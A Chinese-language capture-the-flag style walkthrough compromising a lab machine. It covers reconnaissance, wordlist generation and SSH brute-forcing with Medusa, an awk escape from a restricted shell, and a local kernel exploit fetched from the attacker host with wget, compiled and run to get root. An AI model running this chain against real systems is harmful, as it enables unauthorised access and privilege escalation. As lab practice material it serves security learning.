一.设备:
Kaili: 192.168.56.102
靶机:192.168.56.101
二.步骤
(1)信息搜集
使用nmap搜集主机信息,nmap -sV 192.168.56.101
获得信息,目标主机开放了22和8180端口
(2)端口探查
22端口是ssh服务端口,先放着优先探测大端口,用网页进入该端口发现没有什么可使用信息
再用dirb命令使用大字典对靶机进行目录探测(默认字典经常会漏掉一些东西)
分别进入这两个目录,第一个目录没有什么可用信息,访问第二个目录得到了靶机的服务器名称为::mario.supermariohost.local,然后访问这个服务器发现无法访问,更改kaili的hosts文件中添加配置信息保存即可访问(这一步的目的是为了让域名解析)然后访问mario.supermariohost.local:8180,就可以访问成功了[
(3)获取ssh用户名密码
但是访问后并没有得到什么可用信息,于是使用御剑后台扫描,对mario.supermariohost.local:8180进行扫描,得到的目标逐一访问,然后在luigi.PHP中发现铭感信息。
访问之后使用cewl命令将此页面中的内容生成自定义字典common.txt
Cewl http://mario.supermariohost.local:8180/luigi.php -d -w common.txt
在浏览器中访问字典筛选common.txt信息,再用john命令根据自定义字典,生成相应的用户名和密码的字典
使用美杜莎暴力破解ssh密码
得到用户名:luigi 密码:luigi1
(4)使用ssh远程登陆靶机
Ls查看目录下文件,发现只有一个message文件,打开得知只有一个壳
(5)提权
使用whoami,pwd等命令发现都不可用
输入?查看该shell能使用的命令
经过百度查询了解到使用awk 'BEGIN{system("/bin/bash")}'可以绕过壳,查看到该靶机使用的是linux3.13.0内核,通过互联网漏洞库搜索该版本漏洞
有多个提权程序,本次使用37292.c,复制到/var/www/html目录下
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html/37292.c
再进入复制好的文件夹中
cd /var/www/html/37292.c
打开apsche服务: service apache2 start
在ssh登陆界面下载该漏洞,编译c语言脚本并执行,拿到root权限
wget http://192.168.56.102/37292.c
gcc 37292.c –o exp
./exp
